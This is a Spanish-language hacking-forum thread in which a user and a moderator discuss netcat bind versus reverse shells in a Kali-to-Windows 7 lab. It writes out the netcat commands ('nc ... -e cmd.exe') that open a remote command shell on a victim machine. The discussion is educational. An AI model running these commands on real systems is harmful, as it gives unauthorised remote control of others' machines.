elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  netcat, duda con el tipo de conexiones
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: netcat, duda con el tipo de conexiones  (Leído 3,104 veces)
retr02332

Desconectado Desconectado

Mensajes: 89


Learn, Imagine and Create.


Ver Perfil
netcat, duda con el tipo de conexiones
« en: 16 Agosto 2020, 07:21 am »

Hola a todos.

Tengo una cierta duda con las bind y reverse shell.

(suponiendo kali como atacante y windows 7 como victima)

Conexion directa

windows 7: nc -lvvp 1234 -e cmd.exe
Kali: nc [IP-windows 7] 1234

Conexion reversa

Kali: nc -lvvp 1234
windows 7: nc [IP] 1234 -e cmd.exe

###################################################

Mis dudas son las siguientes:

pregunta 1.¿una conexion directa de windows a kali, es equivalente a una reversa siendo kali el puerto a la escucha?
Se que una conexion reversa es mejor a una directa por muchas cosas como evitar ser filtrado por el firewall, un cambio de ip inesperado por parte del NAT (o hasta del puerto, etc).

Teniendo eso claro, entonces... si windows se conecta a kali de forma directa, a la maquina windows 7...
pregunta 2. ¿tambien presentaria problemas al intentar conectarse conmigo por cosas como mi firewall y asi?

pregunta 3. ¿Asi que la diferencia entre ambos tipos de conexiones radica en quien tiene la bandera "-e shell"?.
¿Es esa entonces la diferencia entre ambos tipos de conexiones?, ¿sobre quien tiene el modificador "-e"?

Muchas gracias
« Última modificación: 16 Agosto 2020, 07:32 am por clay2332xd » En línea

WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.589


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: netcat, duda con el tipo de conexiones
« Respuesta #1 en: 20 Agosto 2020, 07:13 am »

Hola, en tus primeras dos preguntas estás en lo correcto, pero no en la tercera. El flag "-e" siempre se ejecuta del lado del sistema que se desea controlar, independientemente que sea a traves de una conexión directa o inversa.

La diferencia radica en quien escucha y quen conecta y esa opción es "-l" (listen) y "-p" (puerto a escuchar).

Las dos "vv" es para verbose, lo puedes usar tanto en el cliente como en el servidor.

Saludos.
« Última modificación: 20 Agosto 2020, 07:15 am por WHK » En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Duda cliente-servidor, multiples conexiones, administrador de conexiones
Programación Visual Basic
-Xenon- 8 5,200 Último mensaje 14 Enero 2006, 14:44 pm
por -Xenon-
Duda con netcat
Hacking
_I_VITO_I_ 3 3,941 Último mensaje 15 Noviembre 2009, 22:12 pm
por kamsky
duda netcat
Hacking
egiptoelcairo 4 2,859 Último mensaje 18 Mayo 2010, 18:39 pm
por [L]ord [R]NA
Duda netcat y php
Hacking
MichBukana 1 2,287 Último mensaje 22 Octubre 2012, 00:36 am
por Pirat3net
PDF, blog, o lo que sea que explique bien como establecer conexiones con netcat
Hacking
sergioAB 0 1,787 Último mensaje 25 Junio 2017, 20:17 pm
por sergioAB
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines